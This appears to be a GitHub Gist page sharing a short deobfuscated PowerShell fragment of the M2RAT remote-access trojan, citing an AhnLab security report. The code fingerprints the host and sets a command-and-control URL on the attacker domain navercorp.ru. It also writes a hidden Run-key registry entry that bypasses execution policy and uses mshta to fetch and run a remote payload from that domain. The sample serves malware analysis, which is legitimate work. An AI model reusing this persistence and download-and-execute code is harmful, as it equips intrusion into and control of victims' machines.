Loading
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# Deobfuscated M2RAT | |
# Refer: https://asec.ahnlab.com/en/56857/ | |
Start-Sleep -Seconds 68; | |
$buffer = 1024 * 1024; | |
$hostid = $env:COMPUTERNAME + '-' + $env:USERNAME; | |
$C2_URL = 'http://navercorp.ru/dashboard/image/202302/com.php' + '?U=' + $hostid; | |
$TEMPORARY_FILE = $env:TEMP + '\jXShAegMEWMw'; | |
if (!(Test-Path$TEMPORARY_FILE)) { | |
New-ItemProperty -Path HKCU:\Software\ Microsoft\Windows\CurrentVersion\Run -Name fGZtM -Value 'c:\windows\system32\cmd.exe /c PowerShell.exe -WindowStyle hidden -NoLogo -NonInteractive -ep bypass ping -n 1 -w 391763 2.2.2.2 || mshta http://navercorp.ru/dashboard/image/202302/4.html' -PropertyType String -Force; | |
} |
OlderNewer